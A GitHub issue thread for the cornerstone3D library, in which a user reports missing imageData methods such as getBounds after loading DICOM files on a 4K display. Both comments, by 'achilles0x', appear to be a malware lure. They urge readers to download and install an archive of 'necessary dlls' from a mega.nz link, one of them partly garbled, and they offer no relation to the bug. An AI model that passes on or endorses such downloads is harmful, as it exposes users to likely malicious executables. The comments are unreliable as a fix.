### ISSUE TITLE
[Bug] The attributes of imageData are incomplete

### ISSUE THREAD

**Issue by zyf-2016** [cornerstonejs/cornerstone3D#1473]
### Describe the Bug

When I uploaded the dcm file, there were many methods missing from imageData. This happens when I use an all-in-one with a 4K displayer
![20240919164900](https://github.com/user-attachments/assets/bbcaae3a-78a8-4441-9f9c-af9efd7422a6)

### Steps to Reproduce

1. Prepare an all-in-one PC with a 4K display
2. Upload dcm files in local demo

### The current behavior

The imageData missing method is similar to getBounds

### The expected behavior

Gets the normal imageData object

### OS

Windows 10

### Node version

18.20.4

### Browser

Chrome 129.0.6668.59

**Comment by achilles0x** [comment]
This file might fix it//mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQI put the necessary dlls in the archive

**Comment by achilles0x** [comment]
install this
httpsI put the necessary dlls in the archive
